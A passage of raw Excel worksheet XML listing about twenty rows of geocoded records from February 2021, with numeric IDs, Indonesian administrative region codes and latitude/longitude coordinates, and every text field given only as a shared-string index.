        <f t="shared" si="47"/>
        <v>-6.11840,106.91335</v>
      </c>
    </row>
    <row r="3052" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3052">
        <v>248266</v>
      </c>
      <c r="B3052" s="1">
        <v>44243</v>
      </c>
      <c r="C3052" s="2">
        <v>0.26180555555555557</v>
      </c>
      <c r="D3052" t="s">
        <v>2648</v>
      </c>
      <c r="E3052" t="s">
        <v>23</v>
      </c>
      <c r="G3052" t="s">
        <v>10311</v>
      </c>
      <c r="H3052" t="s">
        <v>26</v>
      </c>
      <c r="J3052" t="s">
        <v>10312</v>
      </c>
      <c r="L3052" t="s">
        <v>10313</v>
      </c>
      <c r="M3052">
        <v>3175040003</v>
      </c>
      <c r="N3052">
        <v>3175040</v>
      </c>
      <c r="O3052">
        <v>3175</v>
      </c>
      <c r="P3052">
        <v>31</v>
      </c>
      <c r="Q3052" t="s">
        <v>2062</v>
      </c>
      <c r="R3052" t="s">
        <v>2063</v>
      </c>
      <c r="S3052" t="s">
        <v>547</v>
      </c>
      <c r="T3052" t="s">
        <v>33</v>
      </c>
      <c r="U3052" s="5">
        <v>10691339</v>
      </c>
      <c r="V3052" s="5" t="s">
        <v>17196</v>
      </c>
      <c r="W3052" s="5">
        <v>-611846</v>
      </c>
      <c r="X3052" t="s">
        <v>20938</v>
      </c>
      <c r="Y3052" t="str">
        <f t="shared" si="47"/>
        <v>-6.11846,106.91339</v>
      </c>
    </row>
    <row r="3053" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3053">
        <v>248270</v>
      </c>
      <c r="B3053" s="1">
        <v>44243</v>
      </c>
      <c r="C3053" s="2">
        <v>0.26250000000000001</v>
      </c>
      <c r="D3053" t="s">
        <v>2648</v>
      </c>
      <c r="E3053" t="s">
        <v>23</v>
      </c>
      <c r="G3053" t="s">
        <v>10314</v>
      </c>
      <c r="H3053" t="s">
        <v>26</v>
      </c>
      <c r="J3053" t="s">
        <v>10312</v>
      </c>
      <c r="L3053" t="s">
        <v>10309</v>
      </c>
      <c r="M3053">
        <v>3175040003</v>
      </c>
      <c r="N3053">
        <v>3175040</v>
      </c>
      <c r="O3053">
        <v>3175</v>
      </c>
      <c r="P3053">
        <v>31</v>
      </c>
      <c r="Q3053" t="s">
        <v>2062</v>
      </c>
      <c r="R3053" t="s">
        <v>2063</v>
      </c>
      <c r="S3053" t="s">
        <v>547</v>
      </c>
      <c r="T3053" t="s">
        <v>33</v>
      </c>
      <c r="U3053" s="5">
        <v>10691341</v>
      </c>
      <c r="V3053" s="5" t="s">
        <v>17197</v>
      </c>
      <c r="W3053" s="5">
        <v>-611852</v>
      </c>
      <c r="X3053" t="s">
        <v>18610</v>
      </c>
      <c r="Y3053" t="str">
        <f t="shared" si="47"/>
        <v>-6.11852,106.91341</v>
      </c>
    </row>
    <row r="3054" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3054">
        <v>248283</v>
      </c>
      <c r="B3054" s="1">
        <v>44243</v>
      </c>
      <c r="C3054" s="2">
        <v>0.18958333333333333</v>
      </c>
      <c r="D3054" t="s">
        <v>2648</v>
      </c>
      <c r="E3054" t="s">
        <v>23</v>
      </c>
      <c r="G3054" t="s">
        <v>10315</v>
      </c>
      <c r="H3054" t="s">
        <v>26</v>
      </c>
      <c r="J3054" t="s">
        <v>6426</v>
      </c>
      <c r="L3054" t="s">
        <v>10316</v>
      </c>
      <c r="M3054">
        <v>3174080005</v>
      </c>
      <c r="N3054">
        <v>3174080</v>
      </c>
      <c r="O3054">
        <v>3174</v>
      </c>
      <c r="P3054">
        <v>31</v>
      </c>
      <c r="Q3054" t="s">
        <v>2663</v>
      </c>
      <c r="R3054" t="s">
        <v>695</v>
      </c>
      <c r="S3054" t="s">
        <v>32</v>
      </c>
      <c r="T3054" t="s">
        <v>33</v>
      </c>
      <c r="U3054" s="5">
        <v>10670517</v>
      </c>
      <c r="V3054" s="5" t="s">
        <v>17198</v>
      </c>
      <c r="W3054" s="5">
        <v>-609974</v>
      </c>
      <c r="X3054" t="s">
        <v>20939</v>
      </c>
      <c r="Y3054" t="str">
        <f t="shared" si="47"/>
        <v>-6.09974,106.70517</v>
      </c>
    </row>
    <row r="3055" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3055">
        <v>248497</v>
      </c>
      <c r="B3055" s="1">
        <v>44243</v>
      </c>
      <c r="C3055" s="2">
        <v>0.39163194444444444</v>
      </c>
      <c r="D3055" t="s">
        <v>22</v>
      </c>
      <c r="E3055" t="s">
        <v>23</v>
      </c>
      <c r="F3055" t="s">
        <v>10317</v>
      </c>
      <c r="G3055" t="s">
        <v>10318</v>
      </c>
      <c r="H3055" t="s">
        <v>26</v>
      </c>
      <c r="I3055" t="s">
        <v>753</v>
      </c>
      <c r="J3055" t="s">
        <v>10319</v>
      </c>
      <c r="L3055" t="s">
        <v>10320</v>
      </c>
      <c r="M3055">
        <v>3174070001</v>
      </c>
      <c r="N3055">
        <v>3174070</v>
      </c>
      <c r="O3055">
        <v>3174</v>
      </c>
      <c r="P3055">
        <v>31</v>
      </c>
      <c r="Q3055" t="s">
        <v>83</v>
      </c>
      <c r="R3055" t="s">
        <v>84</v>
      </c>
      <c r="S3055" t="s">
        <v>32</v>
      </c>
      <c r="T3055" t="s">
        <v>33</v>
      </c>
      <c r="U3055" s="5">
        <v>10672026</v>
      </c>
      <c r="V3055" s="5" t="s">
        <v>17199</v>
      </c>
      <c r="W3055" s="5">
        <v>-615682</v>
      </c>
      <c r="X3055" t="s">
        <v>20940</v>
      </c>
      <c r="Y3055" t="str">
        <f t="shared" si="47"/>
        <v>-6.15682,106.72026</v>
      </c>
    </row>
    <row r="3056" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3056">
        <v>248562</v>
      </c>
      <c r="B3056" s="1">
        <v>44243</v>
      </c>
      <c r="C3056" s="2">
        <v>0.40467592592592588</v>
      </c>
      <c r="D3056" t="s">
        <v>22</v>
      </c>
      <c r="E3056" t="s">
        <v>23</v>
      </c>
      <c r="F3056" t="s">
        <v>10321</v>
      </c>
      <c r="G3056" t="s">
        <v>10322</v>
      </c>
      <c r="H3056" t="s">
        <v>26</v>
      </c>
      <c r="I3056" t="s">
        <v>27</v>
      </c>
      <c r="J3056" t="s">
        <v>1380</v>
      </c>
      <c r="L3056" t="s">
        <v>10323</v>
      </c>
      <c r="M3056">
        <v>3174070002</v>
      </c>
      <c r="N3056">
        <v>3174070</v>
      </c>
      <c r="O3056">
        <v>3174</v>
      </c>
      <c r="P3056">
        <v>31</v>
      </c>
      <c r="Q3056" t="s">
        <v>621</v>
      </c>
      <c r="R3056" t="s">
        <v>84</v>
      </c>
      <c r="S3056" t="s">
        <v>32</v>
      </c>
      <c r="T3056" t="s">
        <v>33</v>
      </c>
      <c r="U3056" s="5">
        <v>10673793</v>
      </c>
      <c r="V3056" s="5" t="s">
        <v>17200</v>
      </c>
      <c r="W3056" s="5">
        <v>-615523</v>
      </c>
      <c r="X3056" t="s">
        <v>20941</v>
      </c>
      <c r="Y3056" t="str">
        <f t="shared" si="47"/>
        <v>-6.15523,106.73793</v>
      </c>
    </row>
    <row r="3057" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3057">
        <v>248579</v>
      </c>
      <c r="B3057" s="1">
        <v>44243</v>
      </c>
      <c r="C3057" s="2">
        <v>0.40759259259259256</v>
      </c>
      <c r="D3057" t="s">
        <v>22</v>
      </c>
      <c r="E3057" t="s">
        <v>23</v>
      </c>
      <c r="F3057" t="s">
        <v>10324</v>
      </c>
      <c r="H3057" t="s">
        <v>26</v>
      </c>
      <c r="I3057" t="s">
        <v>27</v>
      </c>
      <c r="J3057" t="s">
        <v>1355</v>
      </c>
      <c r="L3057" t="s">
        <v>10325</v>
      </c>
      <c r="M3057">
        <v>3174070002</v>
      </c>
      <c r="N3057">
        <v>3174070</v>
      </c>
      <c r="O3057">
        <v>3174</v>
      </c>
      <c r="P3057">
        <v>31</v>
      </c>
      <c r="Q3057" t="s">
        <v>621</v>
      </c>
      <c r="R3057" t="s">
        <v>84</v>
      </c>
      <c r="S3057" t="s">
        <v>32</v>
      </c>
      <c r="T3057" t="s">
        <v>33</v>
      </c>
      <c r="U3057" s="5">
        <v>10674467</v>
      </c>
      <c r="V3057" s="5" t="s">
        <v>14822</v>
      </c>
      <c r="W3057" s="5">
        <v>-616056</v>
      </c>
      <c r="X3057" t="s">
        <v>20942</v>
      </c>
      <c r="Y3057" t="str">
        <f t="shared" si="47"/>
        <v>-6.16056,106.74467</v>
      </c>
    </row>
    <row r="3058" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3058">
        <v>248855</v>
      </c>
      <c r="B3058" s="1">
        <v>44243</v>
      </c>
      <c r="C3058" s="2">
        <v>0.46666666666666662</v>
      </c>
      <c r="D3058" t="s">
        <v>2648</v>
      </c>
      <c r="E3058" t="s">
        <v>23</v>
      </c>
      <c r="G3058" t="s">
        <v>10326</v>
      </c>
      <c r="H3058" t="s">
        <v>26</v>
      </c>
      <c r="J3058" t="s">
        <v>2540</v>
      </c>
      <c r="L3058" t="s">
        <v>10327</v>
      </c>
      <c r="M3058">
        <v>3172040005</v>
      </c>
      <c r="N3058">
        <v>3172040</v>
      </c>
      <c r="O3058">
        <v>3172</v>
      </c>
      <c r="P3058">
        <v>31</v>
      </c>
      <c r="Q3058" t="s">
        <v>1351</v>
      </c>
      <c r="R3058" t="s">
        <v>281</v>
      </c>
      <c r="S3058" t="s">
        <v>49</v>
      </c>
      <c r="T3058" t="s">
        <v>33</v>
      </c>
      <c r="U3058" s="5">
        <v>10688823</v>
      </c>
      <c r="V3058" s="5" t="s">
        <v>17201</v>
      </c>
      <c r="W3058" s="5">
        <v>-624089</v>
      </c>
      <c r="X3058" t="s">
        <v>20943</v>
      </c>
      <c r="Y3058" t="str">
        <f t="shared" si="47"/>
        <v>-6.24089,106.88823</v>
      </c>
    </row>
    <row r="3059" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3059">
        <v>249124</v>
      </c>
      <c r="B3059" s="1">
        <v>44243</v>
      </c>
      <c r="C3059" s="2">
        <v>0.52208333333333334</v>
      </c>
      <c r="D3059" t="s">
        <v>22</v>
      </c>
      <c r="E3059" t="s">
        <v>23</v>
      </c>
      <c r="F3059" t="s">
        <v>10328</v>
      </c>
      <c r="H3059" t="s">
        <v>26</v>
      </c>
      <c r="I3059" t="s">
        <v>1909</v>
      </c>
      <c r="J3059" t="s">
        <v>10329</v>
      </c>
      <c r="L3059" t="s">
        <v>10330</v>
      </c>
      <c r="M3059">
        <v>3174070001</v>
      </c>
      <c r="N3059">
        <v>3174070</v>
      </c>
      <c r="O3059">
        <v>3174</v>
      </c>
      <c r="P3059">
        <v>31</v>
      </c>
      <c r="Q3059" t="s">
        <v>83</v>
      </c>
      <c r="R3059" t="s">
        <v>84</v>
      </c>
      <c r="S3059" t="s">
        <v>32</v>
      </c>
      <c r="T3059" t="s">
        <v>33</v>
      </c>
      <c r="U3059" s="5">
        <v>10671681</v>
      </c>
      <c r="V3059" s="5" t="s">
        <v>17202</v>
      </c>
      <c r="W3059" s="5">
        <v>-615513</v>
      </c>
      <c r="X3059" t="s">
        <v>20944</v>
      </c>
      <c r="Y3059" t="str">
        <f t="shared" si="47"/>
        <v>-6.15513,106.71681</v>
      </c>
    </row>
    <row r="3060" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3060">
        <v>249193</v>
      </c>
      <c r="B3060" s="1">
        <v>44243</v>
      </c>
      <c r="C3060" s="2">
        <v>0.53622685185185182</v>
      </c>
      <c r="D3060" t="s">
        <v>22</v>
      </c>
      <c r="E3060" t="s">
        <v>23</v>
      </c>
      <c r="F3060" t="s">
        <v>10331</v>
      </c>
      <c r="H3060" t="s">
        <v>26</v>
      </c>
      <c r="I3060" t="s">
        <v>517</v>
      </c>
      <c r="J3060" t="s">
        <v>3135</v>
      </c>
      <c r="L3060" t="s">
        <v>10332</v>
      </c>
      <c r="M3060">
        <v>3671020018</v>
      </c>
      <c r="N3060">
        <v>3671020</v>
      </c>
      <c r="O3060">
        <v>3671</v>
      </c>
      <c r="P3060">
        <v>36</v>
      </c>
      <c r="Q3060" t="s">
        <v>10302</v>
      </c>
      <c r="R3060" t="s">
        <v>274</v>
      </c>
      <c r="S3060" t="s">
        <v>201</v>
      </c>
      <c r="T3060" t="s">
        <v>171</v>
      </c>
      <c r="U3060" s="5">
        <v>10668824</v>
      </c>
      <c r="V3060" s="5" t="s">
        <v>17203</v>
      </c>
      <c r="W3060" s="5">
        <v>-617292</v>
      </c>
      <c r="X3060" t="s">
        <v>20945</v>
      </c>
      <c r="Y3060" t="str">
        <f t="shared" si="47"/>
        <v>-6.17292,106.68824</v>
      </c>
    </row>
    <row r="3061" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3061">
        <v>249452</v>
      </c>
      <c r="B3061" s="1">
        <v>44243</v>
      </c>
      <c r="C3061" s="2">
        <v>0.5897337962962963</v>
      </c>
      <c r="D3061" t="s">
        <v>22</v>
      </c>
      <c r="E3061" t="s">
        <v>23</v>
      </c>
      <c r="F3061" t="s">
        <v>10333</v>
      </c>
      <c r="H3061" t="s">
        <v>26</v>
      </c>
      <c r="I3061" t="s">
        <v>1447</v>
      </c>
      <c r="J3061" t="s">
        <v>2622</v>
      </c>
      <c r="L3061" t="s">
        <v>2794</v>
      </c>
      <c r="M3061">
        <v>3515110014</v>
      </c>
      <c r="N3061">
        <v>3515110</v>
      </c>
      <c r="O3061">
        <v>3515</v>
      </c>
      <c r="P3061">
        <v>35</v>
      </c>
      <c r="Q3061" t="s">
        <v>2070</v>
      </c>
      <c r="R3061" t="s">
        <v>1928</v>
      </c>
      <c r="S3061" t="s">
        <v>1928</v>
      </c>
      <c r="T3061" t="s">
        <v>1221</v>
      </c>
      <c r="U3061" s="5">
        <v>11272297</v>
      </c>
      <c r="V3061" s="5" t="s">
        <v>17204</v>
      </c>
      <c r="W3061" s="5">
        <v>-745260</v>
      </c>
      <c r="X3061" t="s">
        <v>20946</v>
      </c>
      <c r="Y3061" t="str">
        <f t="shared" si="47"/>
        <v>-7.45260,112.72297</v>
      </c>
    </row>
    <row r="3062" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3062">
        <v>251063</v>
      </c>
      <c r="B3062" s="1">
        <v>44243</v>
      </c>
      <c r="C3062" s="2">
        <v>0.90799768518518509</v>
      </c>
      <c r="D3062" t="s">
        <v>22</v>
      </c>
      <c r="E3062" t="s">
        <v>23</v>
      </c>
      <c r="F3062" t="s">
        <v>10334</v>
      </c>
      <c r="H3062" t="s">
        <v>26</v>
      </c>
      <c r="I3062" t="s">
        <v>666</v>
      </c>
      <c r="J3062" t="s">
        <v>2608</v>
      </c>
      <c r="L3062" t="s">
        <v>10335</v>
      </c>
      <c r="M3062">
        <v>3375040005</v>
      </c>
      <c r="N3062">
        <v>3375040</v>
      </c>
      <c r="O3062">
        <v>3375</v>
      </c>
      <c r="P3062">
        <v>33</v>
      </c>
      <c r="Q3062" t="s">
        <v>10336</v>
      </c>
      <c r="R3062" t="s">
        <v>7339</v>
      </c>
      <c r="S3062" t="s">
        <v>6246</v>
      </c>
      <c r="T3062" t="s">
        <v>1134</v>
      </c>
      <c r="U3062" s="5">
        <v>10967096</v>
      </c>
      <c r="V3062" s="5" t="s">
        <v>17205</v>
      </c>
      <c r="W3062" s="5">
        <v>-687162</v>
      </c>
      <c r="X3062" t="s">
        <v>20947</v>
      </c>
      <c r="Y3062" t="str">
        <f t="shared" si="47"/>
        <v>-6.87162,109.67096</v>
      </c>
    </row>
    <row r="3063" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3063">
        <v>251897</v>
      </c>
      <c r="B3063" s="1">
        <v>44244</v>
      </c>
      <c r="C3063" s="2">
        <v>7.3113425925925915E-2</v>
      </c>
      <c r="D3063" t="s">
        <v>22</v>
      </c>
      <c r="E3063" t="s">
        <v>23</v>
      </c>
      <c r="F3063" t="s">
        <v>10337</v>
      </c>
      <c r="G3063" t="s">
        <v>10338</v>
      </c>
      <c r="H3063" t="s">
        <v>26</v>
      </c>
      <c r="I3063" t="s">
        <v>893</v>
      </c>
      <c r="J3063" t="s">
        <v>2622</v>
      </c>
      <c r="L3063" t="s">
        <v>10339</v>
      </c>
      <c r="M3063">
        <v>3571010007</v>
      </c>
      <c r="N3063">
        <v>3571010</v>
      </c>
      <c r="O3063">
        <v>3571</v>
      </c>
      <c r="P3063">
        <v>35</v>
      </c>
      <c r="Q3063" t="s">
        <v>9255</v>
      </c>
      <c r="R3063" t="s">
        <v>8660</v>
      </c>
      <c r="S3063" t="s">
        <v>8365</v>
      </c>
      <c r="T3063" t="s">
        <v>1221</v>
      </c>
      <c r="U3063" s="5">
        <v>11200762</v>
      </c>
      <c r="V3063" s="5" t="s">
        <v>17206</v>
      </c>
      <c r="W3063" s="5">
        <v>-782522</v>
      </c>
      <c r="X3063" t="s">
        <v>20948</v>
      </c>
      <c r="Y3063" t="str">
        <f t="shared" si="47"/>
        <v>-7.82522,112.00762</v>
      </c>
    </row>
    <row r="3064" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3064">
        <v>252439</v>
      </c>
      <c r="B3064" s="1">
        <v>44244</v>
      </c>
      <c r="C3064" s="2">
        <v>0.19354166666666664</v>
      </c>
      <c r="D3064" t="s">
        <v>22</v>
      </c>
      <c r="E3064" t="s">
        <v>23</v>
      </c>
      <c r="F3064" t="s">
        <v>10340</v>
      </c>
      <c r="H3064" t="s">
        <v>7086</v>
      </c>
      <c r="I3064" t="s">
        <v>10341</v>
      </c>
      <c r="J3064" t="s">
        <v>6038</v>
      </c>
      <c r="L3064" t="s">
        <v>10342</v>
      </c>
      <c r="M3064">
        <v>1206051006</v>
      </c>
      <c r="N3064">
        <v>1206051</v>
      </c>
      <c r="O3064">
        <v>1206</v>
      </c>
      <c r="P3064">
        <v>12</v>
      </c>
      <c r="Q3064" t="s">
        <v>9521</v>
      </c>
      <c r="R3064" t="s">
        <v>9522</v>
      </c>
      <c r="S3064" t="s">
        <v>9523</v>
      </c>
      <c r="T3064" t="s">
        <v>6043</v>
      </c>
      <c r="U3064" s="5">
        <v>9938061</v>
      </c>
      <c r="V3064" s="5" t="s">
        <v>17207</v>
      </c>
      <c r="W3064" s="5">
        <v>219110</v>
      </c>
      <c r="X3064" t="s">
        <v>20949</v>
      </c>
      <c r="Y3064" t="str">
        <f t="shared" si="47"/>
        <v>2.19110,99.38061</v>
      </c>
    </row>
    <row r="3065" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3065">
        <v>253037</v>
      </c>
      <c r="B3065" s="1">
        <v>44244</v>
      </c>
      <c r="C3065" s="2">
        <v>0.31702546296296297</v>
      </c>
      <c r="D3065" t="s">
        <v>22</v>
      </c>
      <c r="E3065" t="s">
        <v>23</v>
      </c>
      <c r="F3065" t="s">
        <v>10343</v>
      </c>
      <c r="H3065" t="s">
        <v>26</v>
      </c>
      <c r="I3065" t="s">
        <v>7368</v>
      </c>
      <c r="J3065" t="s">
        <v>10344</v>
      </c>
      <c r="L3065" t="s">
        <v>10345</v>
      </c>
      <c r="M3065">
        <v>3174070004</v>
      </c>
      <c r="N3065">
        <v>3174070</v>
      </c>
      <c r="O3065">
        <v>3174</v>
      </c>
      <c r="P3065">
        <v>31</v>
      </c>
      <c r="Q3065" t="s">
        <v>926</v>
      </c>
      <c r="R3065" t="s">
        <v>84</v>
      </c>
      <c r="S3065" t="s">
        <v>32</v>
      </c>
      <c r="T3065" t="s">
        <v>33</v>
      </c>
      <c r="U3065" s="5">
        <v>10675042</v>
      </c>
      <c r="V3065" s="5" t="s">
        <v>17208</v>
      </c>
      <c r="W3065" s="5">
        <v>-614287</v>
      </c>
      <c r="X3065" t="s">
        <v>20950</v>
      </c>
      <c r="Y3065" t="str">
        <f t="shared" si="47"/>
        <v>-6.14287,106.75042</v>
      </c>
    </row>
    <row r="3066" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3066">
        <v>253773</v>
      </c>
      <c r="B3066" s="1">
        <v>44244</v>
      </c>
      <c r="C3066" s="2">
        <v>0.46888888888888891</v>
      </c>
      <c r="D3066" t="s">
        <v>85</v>
      </c>
      <c r="E3066" t="s">
        <v>23</v>
      </c>
      <c r="F3066" t="s">
        <v>10346</v>
      </c>
      <c r="G3066" t="s">
        <v>10347</v>
      </c>
      <c r="H3066" t="s">
        <v>26</v>
      </c>
      <c r="J3066" t="s">
        <v>2622</v>
      </c>
      <c r="K3066" t="s">
        <v>10348</v>
      </c>
      <c r="L3066" t="s">
        <v>10349</v>
      </c>
      <c r="M3066">
        <v>3578100005</v>
      </c>
      <c r="N3066">
        <v>3578100</v>
      </c>
      <c r="O3066">
        <v>3578</v>
      </c>
      <c r="P3066">
        <v>35</v>
      </c>
      <c r="Q3066" t="s">
        <v>1902</v>
      </c>
      <c r="R3066" t="s">
        <v>1545</v>
      </c>
      <c r="S3066" t="s">
        <v>1346</v>
      </c>
      <c r="T3066" t="s">
        <v>1221</v>
      </c>
      <c r="U3066" s="5">
        <v>11275988</v>
      </c>
      <c r="V3066" s="5" t="s">
        <v>17209</v>
      </c>
      <c r="W3066" s="5">
        <v>-727031</v>
      </c>
      <c r="X3066" t="s">
        <v>20951</v>
      </c>
      <c r="Y3066" t="str">
        <f t="shared" si="47"/>
        <v>-7.27031,112.75988</v>
      </c>
    </row>
    <row r="3067" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3067">
        <v>253927</v>
      </c>
      <c r="B3067" s="1">
        <v>44244</v>
      </c>
      <c r="C3067" s="2">
        <v>0.52270833333333333</v>
      </c>
      <c r="D3067" t="s">
        <v>22</v>
      </c>
      <c r="E3067" t="s">
        <v>23</v>
      </c>
      <c r="F3067" t="s">
        <v>10350</v>
      </c>
      <c r="H3067" t="s">
        <v>7978</v>
      </c>
      <c r="I3067" t="s">
        <v>7983</v>
      </c>
      <c r="J3067" t="s">
        <v>7277</v>
      </c>
      <c r="L3067" t="s">
        <v>10351</v>
      </c>
      <c r="M3067">
        <v>5103010001</v>
      </c>
      <c r="N3067">
        <v>5103010</v>
      </c>
      <c r="O3067">
        <v>5103</v>
      </c>
      <c r="P3067">
        <v>51</v>
      </c>
      <c r="Q3067" t="s">
        <v>9584</v>
      </c>
      <c r="R3067" t="s">
        <v>9585</v>
      </c>
      <c r="S3067" t="s">
        <v>7281</v>
      </c>
      <c r="T3067" t="s">
        <v>7282</v>
      </c>
      <c r="U3067" s="5">
        <v>11512323</v>
      </c>
      <c r="V3067" s="5" t="s">
        <v>17210</v>
      </c>
      <c r="W3067" s="5">
        <v>-880494</v>
      </c>
      <c r="X3067" t="s">
        <v>20952</v>
      </c>
      <c r="Y3067" t="str">
        <f t="shared" si="47"/>
        <v>-8.80494,115.12323</v>
      </c>
    </row>
    <row r="3068" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3068">
        <v>254123</v>
      </c>
      <c r="B3068" s="1">
        <v>44244</v>
      </c>
      <c r="C3068" s="2">
        <v>0.56329861111111112</v>
      </c>
      <c r="D3068" t="s">
        <v>22</v>
      </c>
      <c r="E3068" t="s">
        <v>23</v>
      </c>
      <c r="F3068" t="s">
        <v>10352</v>
      </c>
      <c r="G3068" t="s">
        <v>10353</v>
      </c>
      <c r="H3068" t="s">
        <v>26</v>
      </c>
      <c r="I3068" t="s">
        <v>517</v>
      </c>
      <c r="J3068" t="s">
        <v>2608</v>
      </c>
      <c r="L3068" t="s">
        <v>10354</v>
      </c>
      <c r="M3068">
        <v>3375040010</v>
      </c>
      <c r="N3068">
        <v>3375040</v>
      </c>
      <c r="O3068">
        <v>3375</v>
      </c>
      <c r="P3068">
        <v>33</v>
      </c>
      <c r="Q3068" t="s">
        <v>10355</v>
      </c>
      <c r="R3068" t="s">
        <v>7339</v>
      </c>
      <c r="S3068" t="s">
        <v>6246</v>
      </c>
      <c r="T3068" t="s">
        <v>1134</v>
      </c>
      <c r="U3068" s="5">
        <v>10967733</v>
      </c>
      <c r="V3068" s="5" t="s">
        <v>17211</v>
      </c>
      <c r="W3068" s="5">
        <v>-686222</v>
      </c>
      <c r="X3068" t="s">
        <v>20953</v>
      </c>
      <c r="Y3068" t="str">
        <f t="shared" si="47"/>
        <v>-6.86222,109.67733</v>
      </c>
    </row>
    <row r="3069" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3069">
        <v>254745</v>
      </c>
      <c r="B3069" s="1">
        <v>44245</v>
      </c>
      <c r="C3069" s="2">
        <v>0.22291666666666665</v>
      </c>
      <c r="D3069" t="s">
        <v>2648</v>
      </c>
      <c r="E3069" t="s">
        <v>23</v>
      </c>
      <c r="G3069" t="s">
        <v>10356</v>
      </c>
      <c r="H3069" t="s">
        <v>26</v>
      </c>
      <c r="I3069" t="s">
        <v>710</v>
      </c>
      <c r="J3069" t="s">
        <v>2140</v>
      </c>
      <c r="L3069" t="s">
        <v>10357</v>
      </c>
      <c r="M3069">
        <v>3171070002</v>
      </c>
      <c r="N3069">
        <v>3171070</v>
      </c>
      <c r="O3069">
        <v>3171</v>
      </c>
      <c r="P3069">
        <v>31</v>
      </c>
      <c r="Q3069" t="s">
        <v>2142</v>
      </c>
      <c r="R3069" t="s">
        <v>121</v>
      </c>
      <c r="S3069" t="s">
        <v>108</v>
      </c>
      <c r="T3069" t="s">
        <v>33</v>
      </c>
      <c r="U3069" s="5">
        <v>10682230</v>
      </c>
      <c r="V3069" s="5" t="s">
        <v>17212</v>
      </c>
      <c r="W3069" s="5">
        <v>-625326</v>
      </c>
      <c r="X3069" t="s">
        <v>20954</v>
      </c>
      <c r="Y3069" t="str">
        <f t="shared" si="47"/>
        <v>-6.25326,106.82230</v>
      </c>
    </row>
    <row r="3070" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3070">
        <v>254748</v>
      </c>
      <c r="B3070" s="1">
        <v>44245</v>
      </c>
      <c r="C3070" s="2">
        <v>0.2603125</v>
      </c>
      <c r="D3070" t="s">
        <v>22</v>
      </c>
      <c r="E3070" t="s">
        <v>23</v>
      </c>
      <c r="F3070" t="s">
        <v>10358</v>
      </c>
      <c r="G3070" t="s">
        <v>10359</v>
      </c>
      <c r="H3070" t="s">
        <v>26</v>
      </c>
      <c r="I3070" t="s">
        <v>10360</v>
      </c>
      <c r="J3070" t="s">
        <v>10361</v>
      </c>
      <c r="L3070" t="s">
        <v>10362</v>
      </c>
      <c r="M3070">
        <v>3171080004</v>
      </c>
      <c r="N3070">
        <v>3171080</v>
      </c>
      <c r="O3070">
        <v>3171</v>
      </c>
      <c r="P3070">
        <v>31</v>
      </c>
      <c r="Q3070" t="s">
        <v>1403</v>
      </c>
      <c r="R3070" t="s">
        <v>1403</v>
      </c>
      <c r="S3070" t="s">
        <v>108</v>
      </c>
      <c r="T3070" t="s">
        <v>33</v>
      </c>
      <c r="U3070" s="5">
        <v>10683627</v>
      </c>
      <c r="V3070" s="5" t="s">
        <v>17213</v>
      </c>
      <c r="W3070" s="5">
        <v>-624653</v>
      </c>
      <c r="X3070" t="s">
        <v>20955</v>
      </c>
      <c r="Y3070" t="str">
        <f t="shared" si="47"/>
        <v>-6.24653,106.83627</v>
      </c>
    </row>
    <row r="3071" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3071">
        <v>254754</v>
      </c>
      <c r="B3071" s="1">
        <v>44245</v>
      </c>
      <c r="C3071" s="2">
        <v>0.27499999999999997</v>
      </c>
      <c r="D3071" t="s">
        <v>2648</v>
      </c>
      <c r="E3071" t="s">
        <v>23</v>
      </c>
      <c r="G3071" t="s">
        <v>10363</v>
      </c>
      <c r="H3071" t="s">
        <v>26</v>
      </c>
      <c r="J3071" t="s">
        <v>4688</v>
      </c>
      <c r="L3071" t="s">
        <v>10364</v>
      </c>
      <c r="M3071">
        <v>3171090001</v>
      </c>
      <c r="N3071">
        <v>3171090</v>
      </c>
      <c r="O3071">
        <v>3171</v>
      </c>
      <c r="P3071">
        <v>31</v>
      </c>
      <c r="Q3071" t="s">
        <v>6003</v>
      </c>
      <c r="R3071" t="s">
        <v>347</v>
      </c>
      <c r="S3071" t="s">
        <v>108</v>
      </c>
      <c r="T3071" t="s">
        <v>33</v>
      </c>
      <c r="U3071" s="5">
        <v>10683696</v>
      </c>
      <c r="V3071" s="5" t="s">
        <v>17214</v>
      </c>
      <c r="W3071" s="5">
        <v>-624132</v>
      </c>
      <c r="X3071" t="s">
        <v>20956</v>
      </c>
      <c r="Y3071" t="str">
        <f t="shared" si="47"/>
        <v>-6.24132,106.83696</v>
      </c>
    </row>
    <row r="3072" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3072">
        <v>254790</v>
      </c>
      <c r="B3072" s="1">
        <v>44245</v>
      </c>
      <c r="C3072" s="2">
        <v>0.33849537037037036</v>
      </c>
      <c r="D3072" t="s">
        <v>22</v>
      </c>
      <c r="E3072" t="s">
        <v>23</v>
      </c>
      <c r="F3072" t="s">
        <v>10365</v>
      </c>
      <c r="G3072" t="s">
        <v>10366</v>
      </c>
      <c r="H3072" t="s">
        <v>26</v>
      </c>
      <c r="I3072" t="s">
        <v>2196</v>
      </c>
      <c r="J3072" t="s">
        <v>2868</v>
      </c>
      <c r="L3072" t="s">
        <v>10367</v>
      </c>
      <c r="M3072">
        <v>3172080001</v>
      </c>
      <c r="N3072">
        <v>3172080</v>
      </c>
      <c r="O3072">
        <v>3172</v>
      </c>
      <c r="P3072">
        <v>31</v>
      </c>
      <c r="Q3072" t="s">
        <v>48</v>
      </c>
      <c r="R3072" t="s">
        <v>141</v>
      </c>
      <c r="S3072" t="s">
        <v>49</v>
      </c>
      <c r="T3072" t="s">
        <v>33</v>
      </c>
      <c r="U3072" s="5">
        <v>10690332</v>
